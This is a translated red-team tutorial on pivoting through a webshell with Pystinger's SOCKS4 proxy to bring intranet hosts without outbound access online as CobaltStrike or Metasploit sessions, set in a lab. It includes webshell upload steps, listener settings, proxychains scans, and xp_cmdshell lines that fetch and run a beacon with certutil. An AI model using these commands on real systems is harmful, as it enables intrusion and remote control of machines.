(Stinger) Using Pystinger SOCKS4 to bring hosts without outbound network access online
2022-07-02 23:17:00 【Bright moon and clear wind~~】
Link to the original text :https://mp.weixin.qq.com/s/cpN91KpBvTHwqqFHAQZDOw
This post continues the series on bringing hosts without outbound network access (hosts that cannot reach the Internet) online, this time using Pystinger's SOCKS4 proxy mode. It covers two common intranet scenarios: a single controlled host, and a multi-homed host used as a pivot to other machines in the intranet.
Project address :https://github.com/FunnyWolf/pystinger
Related reading:
1. Bringing hosts without outbound network access online with MSF: ideas and sharing
2. Bringing hosts without outbound network access online with goproxy (HTTP)
0x01 Test environment
- Attacker (Kali): 192.168.56.101
- Victim 1 (Web): 192.168.56.102 and 192.168.186.3, two network cards
- Victim 2 (Data): 192.168.186.4, no outbound network access
0x02 Pystinger overview
Pystinger consists of a server side (the webshell proxy script plus stinger_server) and a client side (stinger_client). Through the webshell it provides a SOCKS4 proxy into the intranet and port mapping, and it ships proxy scripts for php, jsp(x) and aspx.
The webshell is only responsible for forwarding traffic; most of the work of establishing connections and handling data is done by stinger_server. stinger_client receives the forwarded traffic and, among other things, establishes the TCP connection to the CobaltStrike/MSF listener.
That is the general principle. For a more detailed analysis, see the article "Red team attack and defense practice: a new approach to building intranet tunnels from hosts without outbound network access" on the Qianxin Security Service official account.
0x03 Bringing hosts online with Pystinger
First upload the server-side files of the Pystinger project, stinger_server.exe and proxy.aspx, to a readable and writable directory on the target through the China Chopper (中国菜刀) webshell client. Visiting proxy.aspx should return the string UTF-8, which means the proxy script is working. Then run the following command to start the server.
start C:\inetpub\wwwroot\stinger_server.exe 0.0.0.0
Note: the author recommends starting the server with `start` rather than running D:/XXX/stinger_server.exe directly, because a direct run can cause the TCP connection to drop.
Upload the client stinger_client to the /tmp directory on the Kali attack machine, then run the following command to expose the SOCKS4 proxy on port 60000 of Kali. Replace the -w argument with the URL of the proxy script you uploaded. (`chmod +x` is sufficient here; world-writable permissions are not needed.)
root@kali:/tmp# chmod 777 stinger_client
root@kali:/tmp# ./stinger_client -w http://192.168.56.102/proxy.aspx -l 127.0.0.1 -p 60000
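The following is an added example and is not part of the pystinger project or the original post: a hand-rolled SOCKS4 CONNECT client that talks directly to the port stinger_client opened (127.0.0.1:60000 above) and reports whether a CONNECT to a host in the segment without outbound access is granted. It is a quicker and less noisy sanity check than running nmap through proxychains. The request and reply layouts follow the SOCKS4 specification; `start_fake_socks4_server` is a constructed stand-in for the stinger listener so the block runs offline, and the destination 192.168.186.4:1433 is only an example taken from the article's lab.

```python
#!/usr/bin/env python3
"""Added example: hand-rolled SOCKS4 CONNECT check for a pystinger pivot.

Not part of pystinger or the original post. The proxy address defaults to the
stinger_client listener from the article (127.0.0.1:60000).
"""
import socket
import struct
import threading

SOCKS4_VERSION = 4
CMD_CONNECT = 1
REPLY_GRANTED = 0x5A   # 90: request granted
REPLY_REJECTED = 0x5B  # 91: request rejected or failed


def build_connect_request(dst_ip: str, dst_port: int, userid: bytes = b"") -> bytes:
    """SOCKS4 request: VN(1) CD(1) DSTPORT(2, big endian) DSTIP(4) USERID NUL."""
    return struct.pack("!BBH4s", SOCKS4_VERSION, CMD_CONNECT, dst_port,
                       socket.inet_aton(dst_ip)) + userid + b"\x00"


def parse_reply(data: bytes) -> int:
    """SOCKS4 reply: VN(1, always 0) CD(1) DSTPORT(2) DSTIP(4). Returns CD."""
    if len(data) < 8:
        raise ValueError("short SOCKS4 reply")
    vn, cd, _port, _ip = struct.unpack("!BBH4s", data[:8])
    if vn != 0:
        raise ValueError(f"unexpected SOCKS4 reply version {vn}")
    return cd


def recv_exact(sock: socket.socket, n: int) -> bytes:
    """Read exactly n bytes or raise if the peer closes first."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("proxy closed the connection")
        buf += chunk
    return buf


def socks4_connect(proxy_host: str, proxy_port: int, dst_ip: str, dst_port: int,
                   timeout: float = 5.0) -> socket.socket:
    """Open a TCP stream to dst through the SOCKS4 proxy; raises if not granted."""
    sock = socket.create_connection((proxy_host, proxy_port), timeout=timeout)
    try:
        sock.sendall(build_connect_request(dst_ip, dst_port))
        cd = parse_reply(recv_exact(sock, 8))
    except Exception:
        sock.close()
        raise
    if cd != REPLY_GRANTED:
        sock.close()
        raise ConnectionError(f"CONNECT {dst_ip}:{dst_port} rejected, code {cd}")
    return sock


def check_reachable(dst_ip: str, dst_port: int,
                    proxy_host: str = "127.0.0.1", proxy_port: int = 60000) -> bool:
    """True if the proxy completes a TCP connection to dst_ip:dst_port."""
    try:
        socks4_connect(proxy_host, proxy_port, dst_ip, dst_port).close()
        return True
    except (OSError, ValueError):
        return False


def start_fake_socks4_server(reachable) -> int:
    """Constructed stand-in for the stinger_client listener, used only so this
    block runs offline: grants CONNECT to (ip, port) pairs in `reachable` and
    rejects everything else. Returns the port it bound on 127.0.0.1."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            conn, _ = srv.accept()
            with conn:
                try:
                    vn, cd, dport, dip = struct.unpack("!BBH4s", recv_exact(conn, 8))
                    while conn.recv(1) not in (b"\x00", b""):  # skip USERID up to NUL
                        pass
                except OSError:
                    continue
                ok = (vn == SOCKS4_VERSION and cd == CMD_CONNECT
                      and (socket.inet_ntoa(dip), dport) in reachable)
                conn.sendall(struct.pack("!BBH4s", 0,
                                         REPLY_GRANTED if ok else REPLY_REJECTED, dport, dip))

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


if __name__ == "__main__":
    # Offline demo against the fake listener. Against a live pivot, call
    # check_reachable("192.168.186.4", 1433) with the default proxy instead.
    port = start_fake_socks4_server({("192.168.186.4", 1433)})
    for dst in (("192.168.186.4", 1433), ("192.168.186.4", 445)):
        print(dst, "reachable" if check_reachable(*dst, proxy_port=port) else "unreachable")
```

A rejected reply (code 91) from the real listener means stinger_server could not open the TCP connection on the target side, which is the fastest way to tell a dead pivot from a filtered destination port.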
Scenario 1: single host
The controlled host is a single machine with no outbound network access; only its web port 80 is reachable from outside. After performing the steps above, create a Listener in CobaltStrike with HTTP Hosts set to 127.0.0.1 and HTTP Port set to 60020. By default stinger_server listens on port 60020 on the target and stinger_client forwards whatever arrives there to port 60020 on the attacker side, so a beacon generated from this listener connects to the target's own loopback address and its traffic reaches the CobaltStrike listener through the webshell.
Scenario 2: multiple hosts
The controlled host is one machine in the intranet with two network cards (192.168.56.X is the segment with outbound access, 192.168.186.X the segment without). To move laterally and bring other hosts in the segment without outbound access online, perform the steps above, then create a Listener in CobaltStrike with HTTP Hosts set to 192.168.186.3 and HTTP Port set to 60020.
Once the listener is configured, generate an executable payload and place it on the web server of 192.168.186.3 so that the database server 192.168.186.4, which has no outbound access, can download it; then run beacon.exe through the xp_cmdshell stored procedure.
After that the host comes online, and the Pystinger client also shows the corresponding connection data.
EXEC master..xp_cmdshell 'certutil -urlcache -split -f http://192.168.186.3/beacon.exe C:\ProgramData\beacon.exe'
EXEC master..xp_cmdshell 'C:\ProgramData\beacon.exe'
CobaltStrike listener settings
Single host: CobaltStrike -> Listeners -> Add -> 127.0.0.1:60020
Multiple hosts: CobaltStrike -> Listeners -> Add -> 192.168.186.3:60020
Note: when the target has two network cards, the listener address must be the target's IP in the segment without outbound access; otherwise the hosts in that segment cannot come online.
Using it with MSF
On the Kali attack machine edit /etc/proxychains.conf and add a SOCKS4 entry at the bottom: socks4 127.0.0.1 60000. Then run the following commands to verify that the segment without outbound access is reachable through the proxy. nmap must use a TCP connect scan (-sT) and skip host discovery (-Pn), because only TCP connections pass through a SOCKS4 proxy; ICMP probes and raw-socket scans would bypass it.
root@kali:~# proxychains telnet 192.168.186.4
root@kali:~# proxychains curl http://192.168.186.4
root@kali:~# proxychains nmap -sT -Pn 192.168.186.4
[...SNIP...]
If these succeed, start msfconsole through proxychains and use the target's IP in the segment without outbound access as the listener address. The principle is the same as above, so no screenshots are included.
root@kali:~# proxychains msfconsole -q
[...SNIP...]
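An added example, not from the original post or the pystinger project: a POSIX shell helper that writes a dedicated proxychains configuration for this pivot and checks that the [ProxyList] section holds only the pystinger entry. The stock /etc/proxychains.conf on Kali ships with a `socks4 127.0.0.1 9050` line for Tor, and with `strict_chain` every proxy in the list must be reachable, so appending `socks4 127.0.0.1 60000` below it only works if the Tor line is removed or commented out. The file path /tmp/pystinger.conf and the use of `proxychains4 -f` are assumptions; with a proxychains build that lacks `-f`, write the same content to /etc/proxychains.conf instead.

```shell
#!/bin/sh
# Added example, not part of pystinger or the original post.
# Writes a per-engagement proxychains config that points at the stinger_client
# SOCKS4 listener and verifies that it is the only proxy in the chain.

# write_pystinger_conf FILE HOST PORT
write_pystinger_conf() {
    cat > "$1" <<EOF
# constructed for the pystinger pivot: a single socks4 hop, no leftover Tor entry
strict_chain
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
socks4 $2 $3
EOF
}

# proxylist_entries FILE -> active (non-comment, non-blank) lines after [ProxyList]
proxylist_entries() {
    sed -n '/^\[ProxyList\]/,$p' "$1" | grep -Ev '^[[:space:]]*(#|$)|^\[ProxyList\]'
}

# check_single_socks4 FILE HOST PORT -> exit 0 only if the chain is exactly "socks4 HOST PORT"
check_single_socks4() {
    [ "$(proxylist_entries "$1" | grep -c .)" -eq 1 ] &&
        proxylist_entries "$1" | grep -qx "socks4 $2 $3"
}

# Usage (assumed paths):
#   write_pystinger_conf /tmp/pystinger.conf 127.0.0.1 60000
#   check_single_socks4 /tmp/pystinger.conf 127.0.0.1 60000 &&
#       proxychains4 -f /tmp/pystinger.conf nmap -sT -Pn 192.168.186.4
```

Because pystinger speaks plain SOCKS4, keep destinations as IP addresses, as the article does, rather than relying on hostname resolution through the proxy.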